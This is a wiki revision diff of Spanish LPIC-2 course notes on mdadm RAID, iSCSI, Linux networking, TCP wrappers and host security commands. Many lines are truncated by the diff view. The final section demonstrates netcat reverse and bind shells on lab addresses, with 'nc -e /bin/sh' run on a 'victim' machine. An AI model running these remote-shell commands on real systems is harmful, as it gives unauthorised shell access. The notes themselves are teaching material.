Diferències
Ací es mostren les diferències entre la revisió seleccionada i la versió actual de la pàgina.
Ambdós costats versió prèvia Revisió prèvia Següent revisió | Revisió prèvia | ||
info:cursos:pue:lpic2-2021:s7 [25/02/2021 12:48] – mate | info:cursos:pue:lpic2-2021:s7 [18/09/2022 23:47] (actual) – [LPIC2 2021 Sesión 7 (2021-02-23)] mate | ||
---|---|---|---|
Línia 1: | Línia 1: | ||
- | = LPIC2 2021 Sesión 7 (2021-02-23) | + | = LPIC2 2021 Sesión 7 (2021-02-23) |
== Documentación relacionada: | == Documentación relacionada: | ||
* Manual Certificacion LPIC-2.pdf, pag 72 | * Manual Certificacion LPIC-2.pdf, pag 72 | ||
Línia 10: | Línia 10: | ||
== Clase | == Clase | ||
=== RAID | === RAID | ||
- | <callout type=" | + | <callout type=" |
- | <callout type=" | + | <callout type=" |
* en certificación no preguntan por que es cada RAID (0,1,5,6) | * en certificación no preguntan por que es cada RAID (0,1,5,6) | ||
- | * '' | + | * '' |
+ | * **-C**: crear volume RAID | ||
+ | * **%%--%%create** | ||
+ | * **-S**: desactiva RAID y recursos | ||
+ | * **-v**: verbose | ||
+ | * **%%--%%verbose** | ||
+ | * **/ | ||
+ | * **-l**: nivel de raid: 0,1,5 | ||
+ | * **%%--%%level** | ||
+ | * **-n** | ||
+ | * **%%--%%raid-devices** | ||
+ | * **-D**: comprobación del volumen | ||
+ | * **/ | ||
+ | * **%%--%%spare-devices=< | ||
+ | * **%%--%%detail**: | ||
+ | * **-f < | ||
+ | * **%%--%%fail** | ||
+ | * OJO con raid 0, pueden perderse datos dependiendo de la confiración del spare | ||
+ | * **-r < | ||
+ | * **%%--%%remove** | ||
+ | * **-a < | ||
+ | * **%%--%%add** | ||
+ | * **%%--%%stop**: | ||
+ | * **%%--%%remove**: | ||
+ | * intent bitmap: | ||
+ | * Una cosa importante es contar con el Intent Bitmap activo, esto es una característica que se le agrega a un arreglo por software y permite hacer sincronizaciones diferenciales entre los discos tras producirse una falla, reduciendo asi los tiempos al no tener que sincronizar el disco completo cada vez que algo ocurre. | ||
+ | * '' | ||
+ | * '' | ||
+ | * '' | ||
+ | * **%%--%%query [< | ||
+ | * **%%--%%examine < | ||
* **/ | * **/ | ||
- | <callout type=" | + | * '' |
+ | * **mdadm** no depende de este fichero de configuración para su funcionamiento. Es una manera adicińal de seguir las pista. | ||
+ | * **/etc/ | ||
+ | * | ||
<callout type=" | <callout type=" | ||
==== Laboratorio | ==== Laboratorio | ||
- | <callout type=" | + | <callout type=" |
* crear partición (100%) del tipo Linux RAID **fd** en los discos sdb,sdc,sdd | * crear partición (100%) del tipo Linux RAID **fd** en los discos sdb,sdc,sdd | ||
- | * '' | + | * '' |
* nuevo dispositivo **/ | * nuevo dispositivo **/ | ||
* el nombre ha de ser **/ | * el nombre ha de ser **/ | ||
Línia 29: | Línia 62: | ||
* '' | * '' | ||
* '' | * '' | ||
- | * dejamos en terminal abierto una monitorización sobre el RAID: '' | + | * dejamos en terminal abierto una monitorización sobre el RAID: '' |
* forzamos el fallo de uno de los discos: '' | * forzamos el fallo de uno de los discos: '' | ||
* podemos ver en el terminal de **watch** como el sistema reemplaza el sdb1 por el spare sdd1 | * podemos ver en el terminal de **watch** como el sistema reemplaza el sdb1 por el spare sdd1 | ||
Línia 39: | Línia 72: | ||
* '' | * '' | ||
* '' | * '' | ||
- | * es importante eliminar el superbloque (metadatos): | + | * es importante eliminar el superbloque (metadatos): |
* eliminar configuración: | * eliminar configuración: | ||
* otro comando: '' | * otro comando: '' | ||
Línia 52: | Línia 85: | ||
=== Cabina ISCSI | === Cabina ISCSI | ||
<callout type=" | <callout type=" | ||
- | * Material Practicas LPIC-2/ | + | <callout type=" |
* cabinas con openfiler, para conectarnos | * cabinas con openfiler, para conectarnos | ||
* [[http:// | * [[http:// | ||
Línia 59: | Línia 92: | ||
=== Networking Configuration | === Networking Configuration | ||
- | ==== documentos | + | <callout type=" |
- | * doc: Manual Certificacion LPIC-2.pdf, pag 145 | + | <callout type=" |
- | * doc: Material Practicas LPIC-2/ | + | <callout type=" |
- | * doc: Material Practicas LPIC-2/ | + | |
- | ==== comandos | + | * [[tcpip: |
+ | |||
+ | === Networking Configuration: | ||
* '' | * '' | ||
* nombrar las tarjetas de red a **ethX**: | * nombrar las tarjetas de red a **ethX**: | ||
Línia 74: | Línia 108: | ||
* desactivar IPv6 (si no se ha de utilizar) -> ¿como? | * desactivar IPv6 (si no se ha de utilizar) -> ¿como? | ||
* **NetworkManager**: | * **NetworkManager**: | ||
- | * **hostname** | + | ==== hostname |
- | * centos7: | + | * centos7: |
- | * **/ | + | * **/ |
- | * '' | + | * '' |
- | * centos6: | + | * centos6: |
- | * **/ | + | * **/ |
- | * modificar **/ | + | * modificar **/ |
- | * como buena práctica, que sepa resolverse a si misma | + | |
+ | ==== configuración cliente DNS | ||
* **/ | * **/ | ||
* nameserver: servidores que resuelven | * nameserver: servidores que resuelven | ||
* search: sufijo de búsqueda (lo que añade a los nombres que usamos para localizar máquinas) | * search: sufijo de búsqueda (lo que añade a los nombres que usamos para localizar máquinas) | ||
* domain: el dominio en el que trabajamos | * domain: el dominio en el que trabajamos | ||
+ | |||
+ | ==== puertas de enlace | ||
+ | definir rutas estáticas a otras redes | ||
* '' | * '' | ||
- | | + | |
- | | + | |
- | * '' | + | ==== alias IP |
- | * renombro IPADDR a IPADDR0 y NETMASK a NETMASK0 | + | asignar |
- | * añado IPADDR1 y NETMASK1 con diferente IP | + | * '' |
- | * '' | + | * renombro IPADDR a IPADDR0 y NETMASK a NETMASK0 |
- | * copiar / | + | * añado IPADDR1 y NETMASK1 con diferente IP |
+ | * '' | ||
+ | * copiar / | ||
* forward paquetes (reenvio de paquetes entre 2 redes en 2 interfaces: | * forward paquetes (reenvio de paquetes entre 2 redes en 2 interfaces: | ||
* **/ | * **/ | ||
- | | + | |
+ | * **/ | ||
* **nmtui**: networkManager " | * **nmtui**: networkManager " | ||
* '' | * '' | ||
Línia 105: | Línia 146: | ||
* **/ | * **/ | ||
* '' | * '' | ||
- | ==== Networking Configuration: | + | |
- | * '' | + | ==== arp |
* '' | * '' | ||
+ | * **-n**: consultar caché | ||
+ | * **-d < | ||
+ | * **-s < | ||
+ | * **-f < | ||
+ | dirección_macndirección_ip1 | ||
+ | dirección_ip2 | ||
+ | dirección_ipn | ||
+ | </ | ||
+ | |||
+ | === Networking Configuration: | ||
* '' | * '' | ||
* '' | * '' | ||
* '' | * '' | ||
* '' | * '' | ||
- | * <alert type=" | ||
* shell reverso | * shell reverso | ||
* '' | * '' | ||
Línia 124: | Línia 174: | ||
* '' | * '' | ||
* '' | * '' | ||
+ | * '' | ||
+ | * [[info: | ||
+ | * '' | ||
+ | |||
+ | === Networking Configuration: | ||
+ | <callout type=" | ||
+ | Es posible administrar el acceso a un sistema Linux según la dirección IP o el nombre del host cliente. Se puede gestionar una lista de «todos los que están autorizados», | ||
+ | |||
+ | La implementación TCP Wrappers utilizada en los sistemas Linux se sustenta en la librería libwrap. | ||
+ | |||
* **/ | * **/ | ||
- | * <alert type=" | + | |
- | * <alert type=" | + | * 3 etapas de comprobación de acceso a un servicio embebido TCP: |
- | | + | * está autorizado expresamente |
- | * 3 etapas de comprobación de acceso a un servicio embebido TCP: | + | * está denegado expresamente |
- | * está autorizado expresamente | + | * permitido por defecto |
- | * está denegado expresamente | + | * usa expresiones en sus ficheros de configuración para permitir (o denegar) |
- | * permitido por defecto | + | * ALL |
- | * usa expresiones en sus ficheros de configuración para permitir (o denegar) | + | * LOCAL |
- | * ALL | + | * UNKOWN |
- | * LOCAL | + | * KNOWN |
- | * UNKOWN | + | * PARANOID |
- | * KNOWN | + | * EXCEPT |
- | * PARANOID | + | * permitimos en **allow**, denegamos en **deny** (o tendrá acceso por la tercera regla) |
- | * EXCEPT | + | <callout |
- | * permitimos en **allow**, denegamos en **deny** (o tendrá acceso por la tercera regla) | + | |
- | | + | === Resumen seguridad servicios |
- | | + | <callout type=" |
- | * [[info:cursos:pue:lpic2-2021:s1#sar]] | + | < |
- | * '' | + | Resumen Seguridad de servicos y de red pagina 479 Manual curso LPIC-1 |
+ | |||
+ | |||
+ | find / -type f -perm -4000 | ||
+ | find / -type d -perm -2000 | ||
+ | find / -type d -perm -1000 | ||
+ | |||
+ | ##El comando lsof le ayuda a determinar | ||
+ | ##qué proceso está utilizando un archivo del punto de montaje en el momento de iniciar el comando | ||
+ | lsof /backup/ | ||
+ | lsof /backup/ | ||
+ | COMMAND | ||
+ | bash 8153 root cwd DIR | ||
+ | |||
+ | ##Como administrador, | ||
+ | fuser -km /backup | ||
+ | kill -9 8153 | ||
+ | |||
+ | El comando nmap es un escaneador de puertos: | ||
+ | yum install nmap -y | ||
+ | nmap localhost | ||
+ | namap -A 192.168.1.125 | ||
+ | |||
+ | yum install nmap-frontend -y | ||
+ | zenmap | ||
+ | ----------------------------------------------------------------------------------------------------------------- | ||
+ | ###110.2 Setup host security## | ||
+ | |||
+ | Servicios de red xinetd -->Pag del manual 419 | ||
+ | yum install xinetd | ||
+ | |||
+ | Los archivos de configuración son: | ||
+ | • / | ||
+ | • / | ||
+ | Existe un archivo por servicio, con el mismo nombre que el especificado en / | ||
+ | |||
+ | ##Si modificamos ficheros de configuracion reiniciamos los servicios | ||
+ | service xinetd restart | ||
+ | --------------------------------------------------------------------------------------------- | ||
+ | ############# | ||
+ | |||
+ | ##Resumen manual de LPIC-1 pagina 484 | ||
+ | Los archivos de configuración son / | ||
+ | |||
+ | ##Cada programa que utiliza los tcp_wrappersse compila con la librería libwrap de manera estática | ||
+ | (el comando ldd no permite ver la librería). | ||
+ | |||
+ | [root@sercentos7 ~]# strings -f / | ||
+ | / | ||
+ | |||
+ | Si no se devuelve ninguna línea, el programa no utiliza las tcp_wrappers. | ||
+ | | ||
+ | • sendmail (incluyendo postfix); | ||
+ | • sshd (ssh); | ||
+ | • xinetd (y por lo tanto de manera indirecta todos los servicios asociados); | ||
+ | • vsftpd (ftp); | ||
+ | • portmap (y por lo tanto nis, nfs); | ||
+ | • in.telnetd (telnet), así como la mayoría de los servicios soportados por xinetd; | ||
+ | |||
+ | La comprobación de acceso a un servicio embebido TCP se hace en tres etapas: | ||
+ | • ¿se autoriza el acceso de manera explícita? | ||
+ | • si no es el caso, ¿se prohíbe el acceso de manera explícita? | ||
+ | • si no es el caso, por defecto, se autoriza el acceso. | ||
+ | |||
+ | |||
+ | Para verificar una regla, el sistema lee primero / | ||
+ | La búsqueda se detiene en la primera correspondencia encontrada. | ||
+ | Una línea en hosts.allow autoriza la conexión. | ||
+ | Una línea en hosts.deny prohíbe la conexión. | ||
+ | Si no se deniega de manera explícita el acceso, se autoriza: la petición no corresponde a ningún criterio. | ||
+ | |||
+ | |||
+ | Los archivos de configuración son / | ||
+ | |||
+ | En el ejemplo siguiente: | ||
+ | • Sólo los miembros de la subred 192.168.1.0 tienen permiso para conectarse al servidor ftp (prohibido para todos los demás). | ||
+ | • Los anfitriones puesto1 y puesto2 tienen acceso a telnet y portmap. | ||
+ | • Los anfitriones de baddominio.org, | ||
+ | • Se prohíbe el servicio pop/imap a todos los de la red 192.168.0.0, | ||
+ | |||
+ | / | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | |||
+ | |||
+ | # / | ||
+ | ALL: .baddominio.org except trusted.baddominio.org UNKNOWN | ||
+ | | ||
+ | | ||
+ | |||
+ | La lista de clientes admite una sintaxis avanzada: | ||
+ | • ALL: correspondencia sistemática. | ||
+ | • LOCAL: todos los anfitriones cuyo nombre no contiene punto (puesto1, puesto2, etc.). | ||
+ | • UNKNOWN: anfitrión cuyo nombre no se puede resolver. | ||
+ | • KNOWN: anfitrión cuyo nombre se puede resolver. | ||
+ | • PARANOID: anfitrión cuyo nombre no se puede resolver o cuyo IP no tiene resolución inversa. | ||
+ | • EXCEPT: permite excluir ciertos anfitriones. | ||
+ | ------------------------------------------------------------------------------------------------------------ | ||
+ | ##Reverse Shell-Netcat: | ||
+ | yum install nc -y | ||
+ | $ sudo apt-get update -y | ||
+ | $ sudo apt-get install netcat -y | ||
+ | |||
+ | Este software esta presente en casi todas las distribuciones y es la manera mas sencilla de obener Reverse. | ||
+ | Aun así en los sistemas en producción no suele estar disponible. | ||
+ | |||
+ | ##En la máquina del atacante 192.168.33.10 Centos8: | ||
+ | nc -lvp 1234 | ||
+ | |||
+ | ##En la máquina de la víctima 192.168.33.11 debian-10: | ||
+ | nc -e /bin/sh 192.168.33.10 1234 | ||
+ | |||
+ | |||
+ | |||
+ | ###Bind Shell- Netcat####: | ||
+ | |||
+ | Una bind shell utilizando Netcat. Una bind shell se diferencia de la reverse en que la escucha se realiza en la máquina víctima. | ||
+ | |||
+ | Para el ejemplo la ip de la víctima será la 10.10.10.2 | ||
+ | |||
+ | ##En la máquina de la víctima debian-10 192.168.33.11: | ||
+ | nc -lvp 1234 -e /bin/sh & | ||
+ | |||
+ | ##En la máquina del atacante, 192.168.33.11 es la maquina victima: | ||
+ | nc 192.168.33.11 1234 | ||
+ | </ |